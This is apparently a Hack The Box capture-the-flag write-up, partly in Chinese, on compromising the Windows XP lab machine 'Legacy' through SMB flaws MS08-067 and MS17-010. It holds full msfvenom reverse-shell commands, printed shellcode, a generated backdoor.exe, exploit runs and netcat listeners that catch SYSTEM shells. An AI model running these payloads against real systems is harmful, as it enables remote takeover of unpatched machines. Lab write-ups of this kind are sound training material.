[Hack The Box] Legacy – writeup

Scanning and Enumeration:

nmap:

nmap -sC -sV -O 10.10.10.4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 06:30 EDT
Nmap scan report for 10.10.10.4
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open Windows XP microsoft-ds

三個端口是開啟:
✎135/tcp open msrpc Microsoft Windows RPC
✎139/tcp open netbios-ssn Microsoft Windows netbios-ssn
✎445/tcp open Windows XP microsoft-ds

445 port:

smbmap -H 10.10.10.4
smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER

Vuln

nmap -v -script smb-vuln* -p 135,139,445 10.10.10.4
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

發現兩個漏洞:
✎ms08-076
✎ms17-010

Exploit:

MS08-067:

使用jivoi在Github分享的ms08-067.py

Shellcode Generation:

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=7788 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of py file: 1953 bytes
shellcode = b""
shellcode += b"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0"
shellcode += b"\x5e\x81\x76\x0e\x1c\xb5\x8e\xc1\x83\xee\xfc"
shellcode += b"\xe2\xf4\xe0\x5d\x0c\xc1\x1c\xb5\xee\x48\xf9"
shellcode += b"\x84\x4e\xa5\x97\xe5\xbe\x4a\x4e\xb9\x05\x93"
shellcode += b"\x08\x3e\xfc\xe9\x13\x02\xc4\xe7\x2d\x4a\x22"
shellcode += b"\xfd\x7d\xc9\x8c\xed\x3c\x74\x41\xcc\x1d\x72"
shellcode += b"\x6c\x33\x4e\xe2\x05\x93\x0c\x3e\xc4\xfd\x97"
shellcode += b"\xf9\x9f\xb9\xff\xfd\x8f\x10\x4d\x3e\xd7\xe1"
shellcode += b"\x1d\x66\x05\x88\x04\x56\xb4\x88\x97\x81\x05"
shellcode += b"\xc0\xca\x84\x71\x6d\xdd\x7a\x83\xc0\xdb\x8d"
shellcode += b"\x6e\xb4\xea\xb6\xf3\x39\x27\xc8\xaa\xb4\xf8"
shellcode += b"\xed\x05\x99\x38\xb4\x5d\xa7\x97\xb9\xc5\x4a"
shellcode += b"\x44\xa9\x8f\x12\x97\xb1\x05\xc0\xcc\x3c\xca"
shellcode += b"\xe5\x38\xee\xd5\xa0\x45\xef\xdf\x3e\xfc\xea"
shellcode += b"\xd1\x9b\x97\xa7\x65\x4c\x41\xdd\xbd\xf3\x1c"
shellcode += b"\xb5\xe6\xb6\x6f\x87\xd1\x95\x74\xf9\xf9\xe7"
shellcode += b"\x1b\x4a\x5b\x79\x8c\xb4\x8e\xc1\x35\x71\xda"
shellcode += b"\x91\x74\x9c\x0e\xaa\x1c\x4a\x5b\x91\x4c\xe5"
shellcode += b"\xde\x81\x4c\xf5\xde\xa9\xf6\xba\x51\x21\xe3"
shellcode += b"\x60\x19\xab\x19\xdd\x84\xcb\x12\xbe\xe6\xc3"
shellcode += b"\x1c\xab\xe2\x48\xfa\xdf\x9e\x97\x4b\xdd\x17"
shellcode += b"\x64\x68\xd4\x71\x14\x99\x75\xfa\xcd\xe3\xfb"
shellcode += b"\x86\xb4\xf0\xdd\x7e\x74\xbe\xe3\x71\x14\x74"
shellcode += b"\xd6\xe3\xa5\x1c\x3c\x6d\x96\x4b\xe2\xbf\x37"
shellcode += b"\x76\xa7\xd7\x97\xfe\x48\xe8\x06\x58\x91\xb2"
shellcode += b"\xc0\x1d\x38\xca\xe5\x0c\x73\x8e\x85\x48\xe5"
shellcode += b"\xd8\x97\x4a\xf3\xd8\x8f\x4a\xe3\xdd\x97\x74"
shellcode += b"\xcc\x42\xfe\x9a\x4a\x5b\x48\xfc\xfb\xd8\x87"
shellcode += b"\xe3\x85\xe6\xc9\x9b\xa8\xee\x3e\xc9\x0e\x6e"
shellcode += b"\xdc\x36\xbf\xe6\x67\x89\x08\x13\x3e\xc9\x89"
shellcode += b"\x88\xbd\x16\x35\x75\x21\x69\xb0\x35\x86\x0f"
shellcode += b"\xc7\xe1\xab\x1c\xe6\x71\x14"

猜測受害機器版本:
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

Run Exploit:

┌──(root㉿kali)-[~/Desktop/HTB/Legacy/MS08-067]
└─# python2 MS08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

攻擊機:

┌──(root㉿kali)-[~]
└─# nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1039
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

MS17-010:

使用helviojunior在Github分享的MS17-010

Backdoor.exe Generation:

┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o backdoor.exe

No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: backdoor.exe

Run Exploit:

┌──(root㉿kali)-[~/…/HTB/Legacy/MS17-010/MS17-010]
└─# python2 send_and_execute.py 10.10.10.4 backdoor.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x860e93a8
SESSION: 0xe1a6c810
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe16ea760
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe16ea800
overwriting token UserAndGroups
Sending file 83LKBF.exe...
Opening SVCManager on 10.10.10.4.....
Creating service kOWm.....
Starting service kOWm.....
The NETBIOS connection with the remote host timed out.
Removing service kOWm.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

接收reverse shell:

┌──(root㉿kali)-[~/Desktop/HTB/Legacy/MS08-067]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1040
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Get FLAG:

C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4...

C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d2...

後續:

在windows XP當中是無法使用whoami的指令的
我們可以使用smb分享一個檔案過去

攻擊機:

┌──(root㉿kali)-[~/…/HTB/Legacy/MS17-010/MS17-010]
└─# python /usr/share/doc/python3-impacket/examples/smbserver.py a /usr/share/windows-binaries/

Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

受害機:

C:\WINDOWS\system32>\\10.10.14.11\a\whoami.exe   
\\10.10.14.11\a\whoami.exe
NT AUTHORITY\SYSTEM